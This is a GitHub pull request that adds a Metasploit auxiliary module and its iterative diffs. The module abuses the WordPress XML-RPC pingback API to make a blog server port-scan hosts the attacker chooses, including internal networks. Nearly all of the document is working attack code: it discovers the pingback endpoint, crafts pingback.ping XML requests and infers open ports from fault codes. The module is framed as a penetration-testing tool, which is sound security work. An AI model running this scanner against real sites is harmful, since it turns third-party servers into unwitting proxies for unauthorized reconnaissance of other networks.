### PR TITLE
added wordpress_pingback_portscanner.rb auxiliary module

### DIFF
--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -194,7 +194,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	# method to generate pingback xml-rpc requests
-	def generate_requests(xml_rpcs, target)
+	def generate_requests(xml_rpc_hash, target)
 		port_range = Rex::Socket.portspec_to_portlist(datastore['PORTS'])
 
 		# If target is a DNS name, include IP address in print
@@ -209,7 +209,6 @@ class Metasploit3 < Msf::Auxiliary
 		# Port scanner
 		port_range.each do |i|
 			random = (0...8).map { 65.+(rand(26)).chr }.join
-			xml_rpc_hash = xml_rpcs.sample
 			uri = URI(target)
 			uri.port = i
 			uri.scheme = i == 443 ? "https" : "http"

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
 	def get_blog_posts(xml_rpc)
 		# find all blog posts within RHOST and determine if pingback is enabled
 		print_status("Enumerating Blog posts...")
-		blog_posts = Array.new
+		blog_posts = {}
 
 		# make http request to feed url
 		begin
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
 			pingback_disabled_match = pingback_request.body.match(/<value><int>33<\/int><\/value>/i)
 			if pingback_request.code == 200 and pingback_disabled_match.nil?
 				print_good("Pingback enabled: #{link.join}\n")
-				blog_posts << {:xml_rpc => xml_rpc, :blog_post => blog_post}
+				blog_posts = {:xml_rpc => xml_rpc, :blog_post => blog_post}
 				return blog_posts
 			else
 				print_status("Pingback disabled: #{link.join}")

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					print_status("Web server returned a #{res.code}...following to #{res.headers['Location']}")
 
-					uri = res.headers['Location'].sub(/.*?#{datastore['RHOST']}/, "")
+					uri = res.headers['Location'].sub(/(http|https):\/\/.*?\//, "/")
 					res = send_request_cgi({
 						'uri'    => "#{uri}",
 						'method' => 'GET',
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary
 			return blog_posts
 		end
 
-		links = res.to_s.scan(/<link>([^<]+)<\/link>/i)
+		links = res.body.scan(/<link>([^<]+)<\/link>/i)
 
 		# handle emtpy feeds
 		if links.nil? or links.empty?

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -1,0 +1,279 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'Wordpress Pingback Port Scanner',
+			'Description' => %q{
+					This module will perform a port scan using the Pingback API.
+					You can even scan the server itself or discover some hosts on
+					the internal network this server is part of.
+				},
+			'Author' =>
+				[
+					'Brandon McCann "zeknox" <bmccann[at]accuvant.com>' ,
+					'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
+					'FireFart', # Original PoC
+				],
+			'License' => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'URL', 'http://www.securityfocus.com/archive/1/525045/30/30/threaded'],
+					[ 'URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],
+					[ 'URL', 'https://github.com/FireFart/WordpressPingbackPortScanner'],
+				],
+			))
+
+			register_options(
+				[
+					OptString.new('TARGET', [ true, "Target host you would like to port scan", "127.0.0.1"]),
+					OptString.new('PORTS', [ true, "List of ports to scan (e.g. 22,80,137-139)","21-23,80,443"]),
+
+				], self.class)
+
+			register_advanced_options(
+				[
+					OptInt.new('NUM_REDIRECTS', [ true, "Number of HTTP redirects to follow", 10])
+				], self.class)
+
+	end
+
+	def setup()
+		# If DNS name set variables
+		unless datastore['TARGET'] =~ /[a-zA-Z]+/
+			@if_dns = false
+		else
+			@if_dns = true
+			unless datastore['TARGET'] =~ /^http:\/\/.*/
+				@target_ip = Rex::Socket.getaddress(datastore['TARGET'])
+				datastore['TARGET'] = "http://#{datastore['TARGET']}"
+			else
+				@target_ip = Rex::Socket.getaddress(datastore['TARGET'].sub(/^http:\/\//,""))
+			end
+		end
+
+		# Check if database is active
+		if db()
+			@db_active = true
+		else
+			@db_active = false
+		end
+	end
+
+	def get_xml_rpc_url()
+		# code to find the xmlrpc url when passed in RHOST
+		print_status("Enumerating XML-RPC URI...")
+
+		begin
+			res = send_request_cgi(
+			{
+					'method'	=> 'HEAD',
+			}, 20)
+			# Check if X-Pingback exists and return value
+			unless res.nil?
+				unless res['X-Pingback'].nil?
+					return res['X-Pingback']
+				else
+					print_error("X-Pingback header not found, quiting")
+				end
+			else
+				return false
+			end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+	end
+
+	def get_blog_posts(xml_rpc)
+		# find all blog posts within RHOST and determine if pingback is enabled
+		print_status("Enumerating Blog posts...")
+		blog_posts = Array.new
+
+		# make http request to feed url
+		begin
+			res = send_request_cgi({
+				'uri'    => '/?feed=rss2',
+				'method' => 'GET',
+				}, 25)
+
+			resolve = true
+			count = datastore['NUM_REDIRECTS']
+			while (res.code == 301 || res.code == 302) and count != 0
+				if resolve
+					print_status("Resolving /?feed=rss2 to locate wordpress feed...")
+					resolve = false
+				else
+					print_status("Web server returned a #{res.code}...following to #{res.headers['location']}")
+				end
+				uri = res.headers['location'].sub(/.*?#{datastore['RHOST']}/, "")
+				res = send_request_cgi({
+					'uri'    => "#{uri}",
+					'method' => 'GET',
+					}, 25)
+				if res.code == 200
+					print_status("Feed located at http://#{datastore['RHOST']}#{uri}")
+				end
+				count = count - 1
+			end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+
+			# parse out links and place in array
+			links = res.to_s.scan(/<link>([^<]+)<\/link>/i)
+
+			if res.code != 200 or links.nil? or links.empty?
+				return false
+			end
+
+			links.each do |link|
+				blog_post = link[0]
+				pingback_request = get_pingback_request(xml_rpc, 'http://127.0.0.1', blog_post)
+
+				pingback_disabled_match = pingback_request.body.match(/<value><int>33<\/int><\/value>/i)
+				if pingback_request.code == 200 and pingback_disabled_match.nil?
+					print_good("Pingback enabled: #{link.join}\n")
+					blog_posts << {:xml_rpc => xml_rpc, :blog_post => blog_post}
+					return blog_posts
+					break
+				else
+					print_status("Pingback disabled: #{link.join}")
+				end
+			end
+		return false
+	end
+
+	# Creates the XML data to be sent
+	def generate_pingback_xml (target, valid_blog_post)
+		xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
+		xml << "<methodCall>"
+		xml << "<methodName>pingback.ping</methodName>"
+		xml << "<params>"
+		xml << "<param><value><string>#{target}</string></value></param>"
+		xml << "<param><value><string>#{valid_blog_post}</string></value></param>"
+		xml << "</params>"
+		xml << "</methodCall>"
+		return xml
+	end
+
+	# method to send xml-rpc requests
+	def get_pingback_request(xml_rpc, target, blog_post)
+		uri = xml_rpc.sub(/.*?#{datastore['RHOST']}/,"")
+		# create xml pingback request
+		pingback_xml = generate_pingback_xml(target, blog_post)
+
+		# Send post request with crafted XML as data
+		begin
+			res = send_request_cgi({
+				'uri'    => "#{uri}",
+				'method' => 'POST',
+				'data'	 => "#{pingback_xml}",
+				}, 25)
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+		return res
+	end
+
+	# method to generate pingback xml-rpc requests
+	def generate_requests(xml_rpcs, target)
+		port_range = Rex::Socket.portspec_to_portlist(datastore['PORTS'])
+
+		# If target is a DNS name, include IP address in print
+		if @if_dns
+			the_ip = " (#{@target_ip})"
+		else
+			the_ip = ""
+		end
+
+		print_status("Scanning: #{target}#{the_ip}")
+
+		# Port scanner
+		port_range.each do |i|
+			random = (0...8).map { 65.+(rand(26)).chr }.join
+			xml_rpc_hash = xml_rpcs.sample
+			uri = URI(target)
+			uri.port = i
+			uri.scheme = i == 443 ? "https" : "http"
+			uri.path = "/#{random}/"
+			pingback_request = get_pingback_request(xml_rpc_hash[:xml_rpc], uri.to_s, xml_rpc_hash[:blog_post])
+
+			# Check returns, determine port status
+			if pingback_request.nil?
+				print_status("Issues with port #{i}")
+				next
+			else
+				closed_match = pingback_request.body.match(/<value><int>16<\/int><\/value>/i)
+				if pingback_request.code == 200 and closed_match.nil?
+					print_good("\tPort #{i} is open")
+					store_service(@target_ip, i, "open") if @db_active
+				else
+					print_status("\tPort #{i} is closed")
+					store_service(@target_ip, i, "closed") if @db_active
+				end
+			end
+		end
+	end
+
+	# Save data to services table
+	def store_service(ip, port, state)
+		report_service(:host => ip, :port => port, :state => state)
+	end
+
+	# mMin control method
+	def run
+		begin
+			# handle redirect
+			res = send_request_cgi({
+				'uri'    => '/',
+				'method' => 'GET',
+			}, 25)
+
+			count = datastore['NUM_REDIRECTS']
+
+			while (res.code == 301 || res.code == 302) && count != 0
+				datastore['RHOST'] = res.headers['location'].chomp("/").sub(/^http:\/\//, "")
+				res = send_request_cgi({
+					'uri'    => "/",
+					'method' => 'GET',
+				}, 25)
+				count = count - 1
+			end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+
+		# call method to get xmlrpc url
+		xmlrpc = get_xml_rpc_url()
+
+		# once xmlrpc url is found, get_blog_posts
+		if xmlrpc == false
+			print_error("#{datastore['RHOST']} does not appear to be vulnerable")
+		elsif xmlrpc.nil?
+			print_error("XML-RPC URL not found")
+		else
+			hash = get_blog_posts(xmlrpc)
+
+			# If not DNS, expand list of IPs and scan each
+			if @if_dns == false && hash
+				ip_list = Rex::Socket::RangeWalker.new(datastore['TARGET'])
+				ip_list.each { |ip|
+					generate_requests(hash, "http://#{ip}")
+				}
+			elsif hash
+				generate_requests(hash, datastore['TARGET'])
+			else
+				print_error("No vulnerable blogs found...")
+			end
+		end
+	end
+end

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -139,8 +139,10 @@ class Metasploit3 < Msf::Auxiliary
 				return nil
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("Unable to connect to #{uri}")
 			return nil
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			print_error("Unable to connect to #{uri}")
 			return nil
 		end
 
@@ -232,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			# Check returns, determine port status
 			if pingback_request.nil?
-				print_status("Issues with port #{i}")
+				print_status("\tIssues with port #{i}")
 				next
 			else
 				closed_match = pingback_request.body.match(/<value><int>16<\/int><\/value>/i)

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			register_options(
 				[
-					OptAddress.new('TARGET', [ true, "Target host you would like to port scan", "127.0.0.1"]),
+					OptAddressRange.new('TARGET', [ true, "Target host you would like to port scan", "127.0.0.1"]),
 					OptString.new('PORTS', [ true, "List of ports to scan (e.g. 22,80,137-139)","21-23,80,443"]),
 
 				], self.class)
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_cgi(
 			{
 					'method'	=> 'HEAD',
-			}, 20)
+			})
 			# Check if X-Pingback exists and return value
 			unless res.nil?
 				unless res['X-Pingback'].nil?
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_cgi({
 				'uri'    => '/?feed=rss2',
 				'method' => 'GET',
-				}, 25)
+				})
 
 			resolve = true
 			count = datastore['NUM_REDIRECTS']
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
 				res = send_request_cgi({
 					'uri'    => "#{uri}",
 					'method' => 'GET',
-					}, 25)
+					})
 
 				if res.code == 200
 					print_status("Feed located at http://#{datastore['RHOST']}#{uri}")
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary
 				'uri'    => "#{uri}",
 				'method' => 'POST',
 				'data'	 => "#{pingback_xml}",
-				}, 25)
+				})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
@@ -243,7 +243,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_cgi({
 				'uri'    => '/',
 				'method' => 'GET',
-			}, 25)
+			})
 
 			count = datastore['NUM_REDIRECTS']
 
@@ -252,7 +252,7 @@ class Metasploit3 < Msf::Auxiliary
 				res = send_request_cgi({
 					'uri'    => "/",
 					'method' => 'GET',
-				}, 25)
+				})
 				count = count - 1
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
@@ -265,11 +265,8 @@ class Metasploit3 < Msf::Auxiliary
 		xmlrpc = get_xml_rpc_url()
 
 		# once xmlrpc url is found, get_blog_posts
-		if xmlrpc == false
+		if xmlrpc.nil?
 			print_error("#{datastore['RHOST']} does not appear to be vulnerable")
-		elsif xmlrpc.nil?
-			print_error("XML-RPC URL not found")
-			return false
 		else
 			hash = get_blog_posts(xmlrpc)
 

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -84,12 +84,15 @@ class Metasploit3 < Msf::Auxiliary
 					return res['X-Pingback']
 				else
 					print_error("X-Pingback header not found, quiting")
+					return false
 				end
 			else
 				return false
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			return false
 		end
 	end
 
@@ -119,13 +122,16 @@ class Metasploit3 < Msf::Auxiliary
 					'uri'    => "#{uri}",
 					'method' => 'GET',
 					}, 25)
+
 				if res.code == 200
 					print_status("Feed located at http://#{datastore['RHOST']}#{uri}")
 				end
 				count = count - 1
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			return false
 		end
 
 			# parse out links and place in array
@@ -144,7 +150,6 @@ class Metasploit3 < Msf::Auxiliary
 					print_good("Pingback enabled: #{link.join}\n")
 					blog_posts << {:xml_rpc => xml_rpc, :blog_post => blog_post}
 					return blog_posts
-					break
 				else
 					print_status("Pingback disabled: #{link.join}")
 				end
@@ -179,7 +184,9 @@ class Metasploit3 < Msf::Auxiliary
 				'data'	 => "#{pingback_xml}",
 				}, 25)
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			return false
 		end
 		return res
 	end
@@ -249,7 +256,9 @@ class Metasploit3 < Msf::Auxiliary
 				count = count - 1
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			return false
 		end
 
 		# call method to get xmlrpc url
@@ -260,6 +269,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_error("#{datastore['RHOST']} does not appear to be vulnerable")
 		elsif xmlrpc.nil?
 			print_error("XML-RPC URL not found")
+			return false
 		else
 			hash = get_blog_posts(xmlrpc)
 

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -272,7 +272,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			# If not DNS, expand list of IPs and scan each
 			if @if_dns == false && hash
-				ip_list = Rex::Socket::RangeWalker.new(@target)
+				ip_list = Rex::Socket::RangeWalker.new(datastore['TARGET'])
 				ip_list.each { |ip|
 					generate_requests(hash, "http://#{ip}")
 				}

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -248,7 +248,7 @@ class Metasploit3 < Msf::Auxiliary
 			count = datastore['NUM_REDIRECTS']
 
 			while (res.code == 301 || res.code == 302) && count != 0
-				datastore['RHOST'] = res.headers['location'].chomp("/").sub(/^http:\/\//, "")
+				@target = res.headers['location'].chomp("/").sub(/^http:\/\//, "")
 				res = send_request_cgi({
 					'uri'    => "/",
 					'method' => 'GET',

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -50,9 +50,9 @@ class Metasploit3 < Msf::Auxiliary
 	def setup()
 		# If DNS name set variables
 		unless datastore['TARGET'] =~ /[a-zA-Z]+/
-			@if_dns = false
+			@is_dns = false
 		else
-			@if_dns = true
+			@is_dns = true
 			unless datastore['TARGET'] =~ /^http:\/\/.*/
 				@target_ip = Rex::Socket.getaddress(datastore['TARGET'])
 				@target = "http://#{datastore['TARGET']}"
@@ -90,9 +90,9 @@ class Metasploit3 < Msf::Auxiliary
 				return nil
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			return false
+			return nil
 		rescue ::Timeout::Error, ::Errno::EPIPE
-			return false
+			return nil
 		end
 	end
 
@@ -129,9 +129,9 @@ class Metasploit3 < Msf::Auxiliary
 				count = count - 1
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			return false
+			return nil
 		rescue ::Timeout::Error, ::Errno::EPIPE
-			return false
+			return nil
 		end
 
 		# parse out links and place in array
@@ -185,10 +185,10 @@ class Metasploit3 < Msf::Auxiliary
 				})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			print_error("Unable to connect to #{uri}")
-			return false
+			return nil
 		rescue ::Timeout::Error, ::Errno::EPIPE
 			print_error("Unable to connect to #{uri}")
-			return false
+			return nil
 		end
 		return res
 	end
@@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary
 		port_range = Rex::Socket.portspec_to_portlist(datastore['PORTS'])
 
 		# If target is a DNS name, include IP address in print
-		if @if_dns
+		if @is_dns
 			the_ip = " (#{@target_ip})"
 		else
 			the_ip = ""
@@ -259,10 +259,10 @@ class Metasploit3 < Msf::Auxiliary
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			print_error("Unable to connect to #{datastore[RHOST]}")
-			return false
+			return nil
 		rescue ::Timeout::Error, ::Errno::EPIPE
 			print_error("Unable to connect to #{datastore[RHOST]}")
-			return false
+			return nil
 		end
 
 		# call method to get xmlrpc url
@@ -275,7 +275,7 @@ class Metasploit3 < Msf::Auxiliary
 			hash = get_blog_posts(xmlrpc)
 
 			# If not DNS, expand list of IPs and scan each
-			if @if_dns == false && hash
+			if not @is_dns and hash
 				ip_list = Rex::Socket::RangeWalker.new(datastore['TARGET'])
 				ip_list.each { |ip|
 					generate_requests(hash, "http://#{ip}")

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			register_options(
 				[
-					OptString.new('TARGET', [ true, "Target host you would like to port scan", "127.0.0.1"]),
+					OptAddress.new('TARGET', [ true, "Target host you would like to port scan", "127.0.0.1"]),
 					OptString.new('PORTS', [ true, "List of ports to scan (e.g. 22,80,137-139)","21-23,80,443"]),
 
 				], self.class)
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
 			@if_dns = true
 			unless datastore['TARGET'] =~ /^http:\/\/.*/
 				@target_ip = Rex::Socket.getaddress(datastore['TARGET'])
-				datastore['TARGET'] = "http://#{datastore['TARGET']}"
+				@target = "http://#{datastore['TARGET']}"
 			else
 				@target_ip = Rex::Socket.getaddress(datastore['TARGET'].sub(/^http:\/\//,""))
 			end
@@ -84,10 +84,10 @@ class Metasploit3 < Msf::Auxiliary
 					return res['X-Pingback']
 				else
 					print_error("X-Pingback header not found, quiting")
-					return false
+					return nil
 				end
 			else
-				return false
+				return nil
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			return false
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
 		report_service(:host => ip, :port => port, :state => state)
 	end
 
-	# mMin control method
+	# main control method
 	def run
 		begin
 			# handle redirect
@@ -280,7 +280,7 @@ class Metasploit3 < Msf::Auxiliary
 					generate_requests(hash, "http://#{ip}")
 				}
 			elsif hash
-				generate_requests(hash, datastore['TARGET'])
+				generate_requests(hash, @target)
 			else
 				print_error("No vulnerable blogs found...")
 			end

--- a/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
+++ b/modules/auxiliary/scanner/portscan/wordpress_pingpack_portscanner.rb
@@ -184,8 +184,10 @@ class Metasploit3 < Msf::Auxiliary
 				'data'	 => "#{pingback_xml}",
 				})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("Unable to connect to #{uri}")
 			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			print_error("Unable to connect to #{uri}")
 			return false
 		end
 		return res
@@ -256,8 +258,10 @@ class Metasploit3 < Msf::Auxiliary
 				count = count - 1
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("Unable to connect to #{datastore[RHOST]}")
 			return false
 		rescue ::Timeout::Error, ::Errno::EPIPE
+			print_error("Unable to connect to #{datastore[RHOST]}")
 			return false
 		end
 


### PR DESCRIPTION
This module will connect to the XML-RPC interface that is enabled by default with the latest version of wordpress 3.5. Once connected to the XML-RPC interface it will take advantage of the Pingback API to perform portscanning on the testers behalf.

For additional details please see:
http://www.pentestgeek.com/2013/01/03/wordpress-pingback-portscanner-metasploit-module/
